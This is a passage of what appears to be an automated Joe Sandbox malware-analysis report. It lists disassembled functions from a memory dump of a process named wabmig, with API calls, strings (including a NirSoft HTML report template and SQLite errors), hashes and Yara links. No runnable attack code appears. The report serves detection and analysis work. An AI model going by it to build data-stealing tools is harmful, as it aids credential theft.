                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                            • String ID:
                                                                            • API String ID: 552707033-0
                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                            Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                            • strchr.MSVCRT ref: 0040C140
                                                                            • strchr.MSVCRT ref: 0040C151
                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                            • memset.MSVCRT ref: 0040C17A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                            • String ID: 4$h
                                                                            • API String ID: 4066021378-1856150674
                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                            Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf
                                                                            • String ID: %%0.%df
                                                                            • API String ID: 3473751417-763548558
                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                            Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                            • GetParent.USER32(?), ref: 00406136
                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                            • String ID: A
                                                                            • API String ID: 2892645895-3554254475
                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                            Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                            • memset.MSVCRT ref: 0040DA23
                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                            • String ID: caption
                                                                            • API String ID: 973020956-4135340389
                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                            Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                            • API String ID: 1283228442-2366825230
                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                            Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 00413972
                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                            • memset.MSVCRT ref: 004139B8
                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                            • memset.MSVCRT ref: 00413A00
                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                            • String ID: \systemroot
                                                                            • API String ID: 4173585201-1821301763
                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                            Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy
                                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                            • API String ID: 1284135714-318151290
                                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                            Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                            • String ID: 0$6
                                                                            • API String ID: 4066108131-3849865405
                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                            Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004082EF
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                            • memset.MSVCRT ref: 00408362
                                                                            • memset.MSVCRT ref: 00408377
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 290601579-0
                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                            Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memchr.MSVCRT ref: 00444EBF
                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                            • memset.MSVCRT ref: 0044505E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memchrmemset
                                                                            • String ID: PD$PD
                                                                            • API String ID: 1581201632-2312785699
                                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                            Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                            • GetParent.USER32(?), ref: 00409FA5
                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                            • String ID:
                                                                            • API String ID: 2163313125-0
                                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                            Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$wcslen
                                                                            • String ID:
                                                                            • API String ID: 3592753638-3916222277
                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                            Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040A47B
                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                            • String ID: %s (%s)$YV@
                                                                            • API String ID: 3979103747-598926743
                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                            Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                            • String ID: Unknown Error$netmsg.dll
                                                                            • API String ID: 2767993716-572158859
                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                            Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                            • API String ID: 3176057301-2039793938
                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                            Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                            • database is already attached, xrefs: 0042F721
                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                            • out of memory, xrefs: 0042F865
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                            • API String ID: 1297977491-2001300268
                                                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                            Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                            • String ID: ($d
                                                                            • API String ID: 1140211610-1915259565
                                                                            • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                            • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
